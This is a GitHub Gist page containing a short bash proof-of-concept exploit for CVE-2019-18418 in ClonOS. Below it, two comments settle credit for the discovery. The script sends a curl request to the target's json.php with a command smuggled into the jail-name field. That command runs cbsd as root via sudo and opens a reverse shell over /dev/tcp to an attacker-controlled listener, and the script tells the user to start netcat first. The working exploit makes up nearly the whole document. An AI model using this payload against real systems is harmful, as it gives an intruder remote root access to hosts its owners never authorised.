Last active
November 4, 2019 13:30
-
-
Save bcoles/372f71a17f363b6f337f683ed9f4faeb to your computer and use it in GitHub Desktop.
Trivial ClonOs remote root RCE exploit for CVE-2019-18418
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# clonos-root-rce | |
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker | |
# Note: Start netcat listener on LHOST:LPORT first | |
RHOST="172.16.191.240" | |
LHOST="172.16.191.165" | |
LPORT=1337 | |
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`" |
Author
bcoles
commented
Oct 27, 2019
@bcoles This cve id belongs to me, could it be a mistake?
@Andhrimnirr added discovered by İbrahim Hakan Şeker
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment